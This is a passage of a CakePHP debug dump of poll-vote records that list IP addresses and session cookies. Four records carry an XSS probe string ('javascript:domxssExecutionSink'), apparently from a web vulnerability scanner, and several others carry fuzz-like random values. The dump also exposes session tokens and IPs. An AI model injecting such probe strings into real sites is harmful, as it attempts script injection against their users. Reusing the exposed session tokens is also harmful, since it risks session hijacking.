(int) 5458 => array(
'id' => '6001',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5459 => array(
'id' => '6002',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5460 => array(
'id' => '6003',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5461 => array(
'id' => '6004',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5462 => array(
'id' => '6005',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5463 => array(
'id' => '6006',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5464 => array(
'id' => '6007',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5465 => array(
'id' => '6008',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5466 => array(
'id' => '6009',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5467 => array(
'id' => '6010',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5468 => array(
'id' => '6011',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5469 => array(
'id' => '6012',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5470 => array(
'id' => '6013',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5471 => array(
'id' => '6014',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5472 => array(
'id' => '6015',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5473 => array(
'id' => '6016',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5474 => array(
'id' => '6017',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5475 => array(
'id' => '6018',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5476 => array(
'id' => '6019',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5477 => array(
'id' => '6020',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5478 => array(
'id' => '6021',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5479 => array(
'id' => '6022',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5480 => array(
'id' => '6023',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5481 => array(
'id' => '6024',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5482 => array(
'id' => '6025',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5483 => array(
'id' => '6026',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5484 => array(
'id' => '6027',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5485 => array(
'id' => '6028',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5486 => array(
'id' => '6029',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5487 => array(
'id' => '6030',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5488 => array(
'id' => '6031',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5489 => array(
'id' => '6032',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5490 => array(
'id' => '6033',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5491 => array(
'id' => '6034',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5492 => array(
'id' => '6035',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5493 => array(
'id' => '6036',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5494 => array(
'id' => '6037',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5495 => array(
'id' => '6038',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5496 => array(
'id' => '6039',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5497 => array(
'id' => '6040',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5498 => array(
'id' => '6041',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5499 => array(
'id' => '6042',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5500 => array(
'id' => '6043',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5501 => array(
'id' => '6044',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5502 => array(
'id' => '6045',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5503 => array(
'id' => '6046',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5504 => array(
'id' => '6047',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5505 => array(
'id' => '6048',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5506 => array(
'id' => '6049',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5507 => array(
'id' => '6050',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5508 => array(
'id' => '6051',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5509 => array(
'id' => '6052',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5510 => array(
'id' => '6053',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5511 => array(
'id' => '6054',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5512 => array(
'id' => '6055',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5513 => array(
'id' => '6056',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5514 => array(
'id' => '6057',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5515 => array(
'id' => '6058',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5516 => array(
'id' => '6059',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5517 => array(
'id' => '6060',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5518 => array(
'id' => '6061',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5519 => array(
'id' => '6062',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5520 => array(
'id' => '6063',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5521 => array(
'id' => '6064',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5522 => array(
'id' => '6065',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5523 => array(
'id' => '6066',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5524 => array(
'id' => '6067',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5525 => array(
'id' => '6068',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5526 => array(
'id' => '6069',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5527 => array(
'id' => '6070',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5528 => array(
'id' => '6071',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5529 => array(
'id' => '6072',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5530 => array(
'id' => '6073',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5531 => array(
'id' => '6074',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5532 => array(
'id' => '6075',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5533 => array(
'id' => '6076',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5534 => array(
'id' => '6077',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5535 => array(
'id' => '6078',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5536 => array(
'id' => '6079',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5537 => array(
'id' => '6080',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5538 => array(
'id' => '6081',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5539 => array(
'id' => '6082',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5540 => array(
'id' => '6083',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5541 => array(
'id' => '6084',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5542 => array(
'id' => '6085',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5543 => array(
'id' => '6086',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5544 => array(
'id' => '6087',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5545 => array(
'id' => '6088',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5546 => array(
'id' => '6089',
'ip' => '1FYQ0hVIO',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5547 => array(
'id' => '6090',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5548 => array(
'id' => '6091',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5549 => array(
'id' => '6092',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5550 => array(
'id' => '6093',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5551 => array(
'id' => '6094',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5552 => array(
'id' => '6095',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5553 => array(
'id' => '6096',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5554 => array(
'id' => '6097',
'ip' => '85.190.233.47',
'ip1' => '1MQVflqLO',
'sondage_id' => '2'
),
(int) 5555 => array(
'id' => '6098',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5556 => array(
'id' => '6099',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5557 => array(
'id' => '6100',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5558 => array(
'id' => '6101',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5559 => array(
'id' => '6102',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5560 => array(
'id' => '6103',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5561 => array(
'id' => '6104',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5562 => array(
'id' => '6105',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5563 => array(
'id' => '6106',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5564 => array(
'id' => '6107',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5565 => array(
'id' => '6108',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5566 => array(
'id' => '6109',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5567 => array(
'id' => '6110',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5568 => array(
'id' => '6111',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5569 => array(
'id' => '6112',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5570 => array(
'id' => '6113',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5571 => array(
'id' => '6114',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5572 => array(
'id' => '6115',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5573 => array(
'id' => '6116',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5574 => array(
'id' => '6117',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5575 => array(
'id' => '6118',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5576 => array(
'id' => '6119',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5577 => array(
'id' => '6120',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5578 => array(
'id' => '6121',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5579 => array(
'id' => '6122',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5580 => array(
'id' => '6123',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5581 => array(
'id' => '6124',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5582 => array(
'id' => '6125',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5583 => array(
'id' => '6126',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5584 => array(
'id' => '6127',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5585 => array(
'id' => '6128',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5586 => array(
'id' => '6129',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5587 => array(
'id' => '6130',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5588 => array(
'id' => '6131',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5589 => array(
'id' => '6132',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5590 => array(
'id' => '6133',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5591 => array(
'id' => '6134',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5592 => array(
'id' => '6135',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5593 => array(
'id' => '6136',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5594 => array(
'id' => '6137',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5595 => array(
'id' => '6138',
'ip' => 'mTc8I7Lc',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5596 => array(
'id' => '6139',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5597 => array(
'id' => '6140',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5598 => array(
'id' => '6141',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5599 => array(
'id' => '6142',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5600 => array(
'id' => '6143',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5601 => array(
'id' => '6144',
'ip' => 'I17a1Ftn: evtu2V26',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5602 => array(
'id' => '6145',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5603 => array(
'id' => '6146',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5604 => array(
'id' => '6147',
'ip' => '85.190.233.47',
'ip1' => '7RdjwXMt',
'sondage_id' => '2'
),
(int) 5605 => array(
'id' => '6148',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5606 => array(
'id' => '6149',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5607 => array(
'id' => '6150',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5608 => array(
'id' => '6151',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5609 => array(
'id' => '6152',
'ip' => '85.190.233.47',
'ip1' => 'tciGbI7v: t9pySuXV',
'sondage_id' => '2'
),
(int) 5610 => array(
'id' => '6153',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5611 => array(
'id' => '6154',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5612 => array(
'id' => '6155',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5613 => array(
'id' => '6156',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5614 => array(
'id' => '6157',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5615 => array(
'id' => '6158',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5616 => array(
'id' => '6159',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5617 => array(
'id' => '6160',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5618 => array(
'id' => '6161',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5619 => array(
'id' => '6162',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5620 => array(
'id' => '6163',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5621 => array(
'id' => '6164',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5622 => array(
'id' => '6165',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5623 => array(
'id' => '6166',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5624 => array(
'id' => '6167',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5625 => array(
'id' => '6168',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5626 => array(
'id' => '6169',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5627 => array(
'id' => '6170',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5628 => array(
'id' => '6171',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5629 => array(
'id' => '6172',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5630 => array(
'id' => '6173',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
